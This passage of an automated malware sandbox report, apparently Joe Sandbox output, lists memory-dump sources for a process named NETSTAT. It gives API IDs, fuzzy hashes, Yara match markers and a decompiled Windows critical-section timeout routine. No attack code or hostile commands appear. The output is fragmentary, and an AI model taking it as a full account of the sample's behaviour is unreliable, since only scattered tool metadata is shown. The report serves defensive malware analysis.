                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                  • Instruction ID: 1fa93123a5fed399a572d435050af2e349ddbc6eae5462e40baf85622d894c80
                                  • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                  • Instruction Fuzzy Hash: DFD05E617503042AE610BAA49C03F2632885B55B45F494064FA48963C3D968E5008565
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0042CFC2,0042CFC2,?,00000000,?,?), ref: 00438A80
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 1e001322639cc478076f0aeba9eb7c1c59b9d126d59ec3677524c20280ebe012
                                  • Instruction ID: ca102688c3a2f576428aabf6cfced32a141792104e7994b50df4281ffd2bc7d8
                                  • Opcode Fuzzy Hash: 1e001322639cc478076f0aeba9eb7c1c59b9d126d59ec3677524c20280ebe012
                                  • Instruction Fuzzy Hash: 29C012B12401045B8601EE589C408A67369EFC4214B14841AF81A83151D531D41156A0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                  • Associated: 0000000F.00000002.512995461.0000000002D4B000.00000040.00000800.00020000.00000000.sdmp
                                  • Associated: 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2c30000_NETSTAT.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 7e580f9825b019624801c6ec928b6ca360d56cd845b85b383e04dec2abb5abdf
                                  • Instruction ID: 4f6a3d49c666312cdfd68ca3b921ca7a29af467b69c9abfd0ab629c75a8300a9
                                  • Opcode Fuzzy Hash: 7e580f9825b019624801c6ec928b6ca360d56cd845b85b383e04dec2abb5abdf
                                  • Instruction Fuzzy Hash: C3B09BB19014C6D5DB51D765460C7177A1077D0745F66C055D1030681A4778C191F5B5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 53%
                                  			E02CEFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                  				void* _t7;
                                  				intOrPtr _t9;
                                  				intOrPtr _t10;
                                  				intOrPtr* _t12;
                                  				intOrPtr* _t13;
                                  				intOrPtr _t14;
                                  				intOrPtr* _t15;
                                  
                                  				_t13 = __edx;
                                  				_push(_a4);
                                  				_t14 =  *[fs:0x18];
                                  				_t15 = _t12;
                                  				_t7 = E02C9CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                  				_push(_t13);
                                  				E02CE5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                  				_t9 =  *_t15;
                                  				if(_t9 == 0xffffffff) {
                                  					_t10 = 0;
                                  				} else {
                                  					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                  				}
                                  				_push(_t10);
                                  				_push(_t15);
                                  				_push( *((intOrPtr*)(_t15 + 0xc)));
                                  				_push( *((intOrPtr*)(_t14 + 0x24)));
                                  				return E02CE5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                  			}











                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02CEFDFA
                                  Strings
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02CEFE2B
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02CEFE01
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                  • Associated: 0000000F.00000002.512995461.0000000002D4B000.00000040.00000800.00020000.00000000.sdmp
                                  • Associated: 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2c30000_NETSTAT.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                  • API String ID: 885266447-3903918235
                                  • Opcode ID: 317d6b131f3a3581a81527822010f7c487a1fa1b4c507590f302f57a94450fe4
                                  • Instruction ID: c357f64946f2697169d74e9c51462737fc7f79b9c2ccd7112b4105ea18971f3f
                                  • Opcode Fuzzy Hash: 317d6b131f3a3581a81527822010f7c487a1fa1b4c507590f302f57a94450fe4
                                  • Instruction Fuzzy Hash: 73F0F676200641BFFA201A55DC06F23BB6FEB84770F140319F629565D1DE62F93096F1
                                  Uniqueness

                                  Uniqueness Score: -1.00%